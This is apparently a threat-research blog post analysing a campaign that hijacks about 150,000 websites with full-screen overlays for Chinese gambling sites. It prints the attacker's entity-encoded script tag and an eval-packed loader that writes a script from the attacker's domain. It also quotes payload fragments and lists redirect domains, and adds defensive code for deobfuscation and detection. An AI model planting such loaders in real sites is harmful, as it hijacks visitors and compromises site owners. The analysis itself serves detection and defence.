
Over 150K websites hit by full-page hijack linking to Chinese gambling sites

Wednesday, March 26th, 2025


Himanshu Anand

In February, we uncovered a threat actor targeting over 35,000 websites with a malicious full-page hijack injection. We’ve continued to monitor this actor’s activities and have identified new tactics and techniques. They’ve scaled up their operations significantly, as we now estimate that approximately 150,000 websites have been impacted by this campaign.

What’s new in this attack?

UI/UX changes

The threat actor has slightly revamped the look of the injected page but still relies on an iframe injection to display a full-screen overlay in the visitor's browser. One of their latest injected pages is shown in the accompanying screenshot.

Even though the visuals and layout differ from the February version, the underlying injection method remains the same at its core.

Variations on the same theme

Another variation of this attack shows similar behavior, injecting scripts and iframes that impersonate legitimate betting websites such as Bet365. In many instances, official logos and branding are reused to make the attack appear more convincing.

HTML entity encoding in the injected code

In the page's static HTML, the malicious script tag is injected as:

<script type="text/javascript" charset="utf-8" rel="nofollow" src="&#47;&#64;&#112;&#117;&#98;&#108;&#105;&#99;&#47;&#98;&#97;&#115;&#101;&#46;&#106;&#115;"></script>

This is HTML entity encoding, a different way of obfuscating code. The browser decodes the entities in the src attribute before it fetches the script, so the page behaves exactly as if the path were written in plain text, while a grep of the raw HTML for the path never matches and a casual look at the tag shows nothing readable. Decoding this snippet back into plain text reveals:

<script type="text/javascript" charset="utf-8" rel="nofollow" src="/@public/base.js"></script>

The attack also contains JavaScript wrapped in the widely used eval(function(p,a,c,k,e,d){...}) packer, which rebuilds the real source from a token string and a word list at run time and then eval()s it:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\q\\a\\2\\e\\f\\9\\n\\0"]["\\p\\5\\6\\0\\9"](\'\\k\\1\\2\\5\\6\\3\\0 \\0\\j\\3\\9\\i\\7\\0\\9\\t\\0\\4\\8\\h\\u\\h\\1\\2\\5\\6\\3\\0\\7  \\1\\5\\2\\i\\7\\m\\0\\0\\3\\1\\s\\4\\4\\c\\c\\c\\b\\b\\b\\d\\g\\e\\6\\g\\m\\a\\n\\r\\j\\8\\d\\2\\a\\f\\4\\8\\e\\f\\3\\d\\8\\1\\7\\l\\k\\4\\1\\2\\5\\6\\3\\0\\l\');',31,31,'x74|x73|x63|x70|x2f|x72|x69|x22|x6a|x65|x6f|x66|x38|x2e|x75|x6d|x7a|x61|x3d|x79|x3c|x3e|x68|x6e|window|x77|x64|x67|x3a|x78|x76'.split('|'),0,{}))

You can decode HTML Entity-encoded text using free tools like CyberChef.

Unpacking it (substituting the word list back into the token string) yields a document.write call whose strings are hex-escaped:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](
  '\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22  \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x38\x38\x38\x66\x66\x66\x2e\x7a\x75\x69\x7a\x68\x6f\x6e\x67\x79\x6a\x2e\x63\x6f\x6d\x2f\x6a\x75\x6d\x70\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e'
);

Resolving the \xHH escapes shows what it actually writes into the page:

<script type="text/javascript" src="hxxps://888fff.zuizhongyj[.]com/jump.js"></script>

Each layer exists to hide the loader from quick scans and signature-based detection: the raw HTML never contains the attacker's domain or the string jump.js in readable form, and neither appears until both the packer and the hex escapes have been undone.
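All three layers can be peeled back without ever executing the payload. The following is an added example written for this article, not code from the c/side post or from the threat actor's toolkit: it decodes the numeric entities, performs the packer's token substitution in place of eval(), and resolves the hex escapes. The only inputs are the two snippets quoted above (the entity-encoded src and the packer's p and k arguments); the function and constant names are my own.

```javascript
// Added example for this article (not c/side's or the attacker's code): peel the three
// obfuscation layers described above without eval(). The two inputs are the snippets
// quoted in the post; function and constant names are my own.

// Layer 1: numeric HTML entities (&#47; or &#x2f;) in an attribute value. The browser
// decodes them before fetching, so the page works as normal while a grep of the raw
// HTML for "/@public/base.js" finds nothing.
function decodeHtmlEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);/gi, (_, code) =>
    String.fromCodePoint(/^x/i.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10))
  );
}

// Layer 2: the eval(function(p,a,c,k,e,d){...}) packer. It rebuilds the source by
// replacing every base-`a` token in `p` with the word at that index in `k`, then
// eval()s the result. Doing the substitution ourselves yields the source unexecuted.
function unpackPacker(p, a, c, k) {
  const encode = (n) => {                       // same token encoding the packer uses
    const prefix = n < a ? '' : encode(Math.floor(n / a));
    const r = n % a;
    return prefix + (r > 35 ? String.fromCharCode(r + 29) : r.toString(36));
  };
  let src = p;
  while (c--) {
    if (k[c]) src = src.replace(new RegExp('\\b' + encode(c) + '\\b', 'g'), k[c]);
  }
  return src;
}

// Layer 3: \xHH escapes that hide "document", "write" and the URL inside string literals.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Collect the URLs that surface once everything is decoded, for an IOC list.
function extractUrls(s) {
  return [...s.matchAll(/https?:\/\/[^\s"'<>]+/g)].map((m) => m[0]);
}

// The src attribute quoted in the post, and the packer's (p, k) arguments as quoted.
const ENTITY_SRC = '&#47;&#64;&#112;&#117;&#98;&#108;&#105;&#99;&#47;&#98;&#97;&#115;&#101;&#46;&#106;&#115;';
const PACKED_P = 'o["\\q\\a\\2\\e\\f\\9\\n\\0"]["\\p\\5\\6\\0\\9"](\'\\k\\1\\2\\5\\6\\3\\0 \\0\\j\\3\\9\\i\\7\\0\\9\\t\\0\\4\\8\\h\\u\\h\\1\\2\\5\\6\\3\\0\\7  \\1\\5\\2\\i\\7\\m\\0\\0\\3\\1\\s\\4\\4\\c\\c\\c\\b\\b\\b\\d\\g\\e\\6\\g\\m\\a\\n\\r\\j\\8\\d\\2\\a\\f\\4\\8\\e\\f\\3\\d\\8\\1\\7\\l\\k\\4\\1\\2\\5\\6\\3\\0\\l\');';
const PACKED_K = 'x74|x73|x63|x70|x2f|x72|x69|x22|x6a|x65|x6f|x66|x38|x2e|x75|x6d|x7a|x61|x3d|x79|x3c|x3e|x68|x6e|window|x77|x64|x67|x3a|x78|x76'.split('|');

// Run the three stages in order and return every intermediate, so each layer can be inspected.
function deobfuscateLoader() {
  const stage1 = decodeHtmlEntities(ENTITY_SRC);            // "/@public/base.js"
  const stage2 = unpackPacker(PACKED_P, 31, 31, PACKED_K);  // window["\x64..."]["\x77..."]('...')
  const stage3 = decodeHexEscapes(stage2);                  // window["document"]["write"]('<script ... jump.js">...')
  return { stage1, stage2, stage3, urls: extractUrls(stage3) };
}

console.log(deobfuscateLoader());
```

Because the substitution is done by hand, the packed string is never evaluated, so the same routine can be pointed at any eval(function(p,a,c,k,e,d)) blob pulled from a compromised site; only the p, a, c and k arguments change.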

Analyzing the final JavaScript payload

Below are some critical highlights from the final script:

Keyword-based detection logic
The script defines an array of keywords related to betting, gambling, and casino brands both in English and Chinese (e.g., bet365, WilliamHill, tyc, bwin, 12bet, w88, 宝威, 太阳城).

It then checks the <title> tag of the current page against this list:

var keyWord = [
  { key: [...], id: 1 },   // one group of brand/keyword strings per numeric id
  ...
];
b = document.getElementsByTagName("title")[0].innerText;       // the current page's title
if (b.match(new RegExp(keyWord[i].key[j], 'ig')) != null) {   // case-insensitive keyword hit
  a = keyWord[i].id;   // id of the group that matched
  c = '?id=';          // query-string prefix for the next stage
  ...
}

Once a match is found, the script sets up an ID parameter (?id=) for use in the next stage of the redirect.

Viewport Tag enforcement
The code includes a handleViewportTag() function, driven by both a MutationObserver and a setInterval timer, that repeatedly re-inserts a mobile viewport tag whenever it is missing:

<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">

This ensures the fullscreen overlay renders correctly on mobile devices, and user-scalable=no keeps the visitor from pinch-zooming out of it.

Fullscreen overlay + iframe injection
The attacker’s script creates a <div class="lbb"> that covers the entire screen (via CSS position: fixed; z-index: 9999; ...) and injects a fullscreen <iframe>:

var web = 'https://888fff.zuizhongyj.com/' + c + a;
document.write('<iframe src="'+web+'" ... ></iframe>');

Anyone visiting the compromised site sees the malicious gambling landing page instead of the legitimate page content.
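The behaviours just described (brand keyword list, title sniffing, viewport enforcement, fixed overlay, iframe via document.write, the known domain) make a usable triage heuristic for any JavaScript file pulled from a suspect site. The following is an added example, not c/side's detection logic: the indicator names, weights and thresholds are my own choices, and both sample scripts are constructed for the demonstration rather than copied from the actual jump.js.

```javascript
// Added example for this article (not c/side's detection logic): a static triage
// heuristic for a fetched JavaScript file, built from the final-payload behaviours
// described above. Indicator names, weights and thresholds are my own choices.

const INDICATORS = [
  { name: 'betting/casino brand keyword list', weight: 2,
    test: (s) => (s.match(/bet365|williamhill|bwin|12bet|w88|宝威|太阳城/gi) || []).length >= 3 },
  { name: 'sniffs the <title> for keywords', weight: 1,
    test: (s) => /getElementsByTagName\(\s*["']title["']\s*\)/.test(s) },
  { name: 'forces a non-zoomable mobile viewport', weight: 1,
    test: (s) => /user-scalable\s*=\s*no/i.test(s) },
  { name: 'keeps re-applying the viewport (observer + timer)', weight: 1,
    test: (s) => /MutationObserver/.test(s) && /setInterval\s*\(/.test(s) },
  { name: 'fixed full-screen overlay with a huge z-index', weight: 2,
    test: (s) => /position\s*:\s*fixed/i.test(s) && /z-index\s*:\s*\d{4,}/i.test(s) },
  { name: 'iframe injected via document.write', weight: 2,
    test: (s) => /document\.write\([\s\S]{0,300}?<iframe/i.test(s) },
  { name: 'known campaign domain', weight: 3,
    test: (s) => /zuizhongyj\.com/i.test(s) },
];

// Score a script's source text. Thresholds are arbitrary: a single strong indicator
// such as a fixed overlay is common in legitimate code and must not trip on its own.
function triageScript(source) {
  const matched = INDICATORS.filter((i) => i.test(source));
  const score = matched.reduce((n, i) => n + i.weight, 0);
  const verdict = score >= 5 ? 'likely hijack payload' : score >= 3 ? 'review' : 'clean';
  return { score, verdict, hits: matched.map((i) => i.name) };
}

// Constructed sample that mirrors the fragments quoted in the post (not the real jump.js).
const SUSPECT = `
var keyWord=[{key:["bet365","WilliamHill","bwin","12bet","w88","宝威","太阳城"],id:1}];
var b=document.getElementsByTagName("title")[0].innerText;
function handleViewportTag(){var m=document.createElement("meta");m.name="viewport";
m.content="width=device-width, initial-scale=1.0, user-scalable=no";document.head.appendChild(m);}
new MutationObserver(handleViewportTag).observe(document.documentElement,{childList:true,subtree:true});
setInterval(handleViewportTag,500);
var web='https://888fff.zuizhongyj.com/'+c+a;
document.write('<div class="lbb" style="position: fixed; z-index: 9999; top:0; left:0; width:100%; height:100%"><iframe src="'+web+'"></iframe></div>');
`;

// Constructed benign sample: a cookie banner that also uses a fixed, high z-index element.
const BENIGN = `
(function(){var d=document.createElement("div");d.style.cssText="position: fixed; z-index: 9999; bottom:0";
d.textContent="This site uses cookies.";document.body.appendChild(d);})();
`;

console.log(triageScript(SUSPECT));
console.log(triageScript(BENIGN));
```

The benign banner fires only the overlay indicator and comes back clean, which is the point of weighting: the campaign is recognisable by the combination of behaviours, not by any one of them. Treat the result as triage, not a signature; the actor can rename strings or move domains, so the decoded script still needs a human look.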

Redirect destinations

We observed multiple redirect URLs during analysis, including:

hxxps://551007t[.]cc/

hxxps://t399229[.]com/

hxxps://www.wa38di[.]com:7443/other/restrictionIp?name=access-caveat

Previously seen in other campaigns:

hxxps://W88in[.]com

hxxps://b217102[.]cc/

hxxps://g977115[.]com/

hxxps://lucky298[.]com/

Several of these sites selectively block traffic from specific regions, leading us to suspect the primary targets are Chinese-speaking users in China, Hong Kong, and the United States.

Scale of the attack: 150K websites (and counting)

By leveraging public search tools (e.g., PublicWWW), we clustered all websites that include the obfuscated script snippet. At the time of our analysis, we identified over 150,000 unique sites. A live query of these infections is linked from the original post.

This attack demonstrates how threat actors constantly adapt, increasing their reach and using new layers of obfuscation. Client-side attacks like these are on the rise, with more and more findings every day.

If you suspect your site might be impacted, review every <script> tag for HTML entity encoding in its src, look through your JavaScript for eval(function(p,a,c,k,e,d) packers and hex-escaped document.write calls, and check for <iframe> or <meta name="viewport"> elements you did not put there. As always, ongoing vigilance and regular site auditing remain your best defenses against attacks like these.


More About Himanshu Anand

I'm a software engineer and security analyst at c/side.